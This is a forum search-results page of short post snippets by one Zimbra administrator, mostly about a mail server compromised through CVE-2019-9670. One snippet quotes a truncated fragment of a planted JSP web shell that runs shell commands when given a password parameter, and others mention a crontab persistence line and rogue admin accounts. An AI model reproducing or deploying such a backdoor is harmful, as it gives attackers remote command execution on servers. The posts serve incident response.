Search found 16 matches
- Thu Nov 02, 2023 11:59 am
- Forum: Administrators
- Topic: Zimbra whitelist
- Replies: 1
- Views: 2502
Zimbra whitelist
I use this script : =============== https://wiki.zimbra.com/index.php?title=Improving_Anti-spam_system User white/black list It very simple changing amavis config: put in /opt/zimbra/conf/amavis.conf.in read_hash(\%whitelist_sender, '/etc/zimbra/whitelist'); read_hash(\%blacklist_sender, '/etc/zimbr...
- Mon Apr 26, 2021 8:52 am
- Forum: Installation and Upgrade
- Topic: Zimbra without a purchased domain name and a public IP?
- Replies: 15
- Views: 13601
Re: Zimbra without a purchased domain name and a public IP?
Did you find a solution?notooth wrote:This is my new /etc/hosts, but it does not fix the error:Code: Select all
127.0.0.1 localhost.localdomain localhost 192.168.100.200 NetBSD.my.domain NetBSD
- Fri May 31, 2019 8:25 am
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631800
Re: CVE-2019-9670 being actively exploited
Help me with this plz : /opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java:if("lMIAb3JS-s7dPUDkAZA-O8INcT4vQWNQ_oILtGOGZLE".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","...
- Fri May 31, 2019 7:40 am
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631800
Re: CVE-2019-9670 being actively exploited
The problem appeared again. Do you have these folders? /opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp with: /opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class /opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java and /opt/zimb...
- Thu May 30, 2019 11:48 am
- Forum: Administrators
- Topic: Zimbra AJAX Webmail not loading
- Replies: 127
- Views: 120517
Re: Zimbra AJAX Webmail not loading
I have my zimbra 8.6 with the last patch I that I downloaded from ZImbras site, patch 14. My OS is Redhat 6.6. The servers is pattched but what can I do to remove this script? Thanks for any help. Thanks to Drake for support :) Zimbra 8.6.0 GA Network Editions , CentOS 6.6 Patch Zimbra : wget https...
- Thu May 30, 2019 7:45 am
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631800
Re: CVE-2019-9670 being actively exploited
Thanks to Drake for support :) Zimbra 8.6.0 GA Network Editions , CentOS 6.6 Patch Zimbra : wget https://files.zimbra.com/downloads/8.6.0_GA/zcs-patch-8.6.0_GA_1242.tgz tar xzf zcs-patch-8.6.0_GA_1242.tgz cd /tar xzf zcs-patch-8.6.0_GA_1242 Delete global admin accounts Change password # Zimbra AJAX...
- Wed May 29, 2019 2:38 pm
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631800
Re: CVE-2019-9670 being actively exploited
How do I extract the original files from the installation source to replace the infected files with them? Under Windows.
Zimbra 8.6.0_GA Network Editions
edit: https://www.altap.cz/salamander/feature ... r-windows/
Zimbra 8.6.0_GA Network Editions
edit: https://www.altap.cz/salamander/feature ... r-windows/
- Wed May 29, 2019 10:45 am
- Forum: Administrators
- Topic: Zimbra AJAX Webmail not loading
- Replies: 127
- Views: 120517
Re: Zimbra AJAX Webmail not loading
How to list/ view global admin accounts?Ignat wrote:i hava a same problem with server . i founded many global admin accounts in users newly created
How to create and Admin account
- Wed May 29, 2019 8:32 am
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631800
Re: CVE-2019-9670 being actively exploited
I find this: ==== /opt/zimbra/libexec/600.zimbra:if [ -f /opt/zimbra/log/swatch.pid ]; then echo "Restarting zmswatch"; $SU "/opt/zimbra/bin/zmswatchctl reload"; fi /opt/zimbra/libexec/zmrcd: "start snmp" => "/opt/zimbra/bin/zmswatchctl start", /opt/zimbra/lib...
- Tue May 28, 2019 10:56 am
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631800
Re: CVE-2019-9670 being actively exploited
I did not express myself correctly.
Everything from my crontab was removed - only one line left to start exploit.
Everything from my crontab was removed - only one line left to start exploit.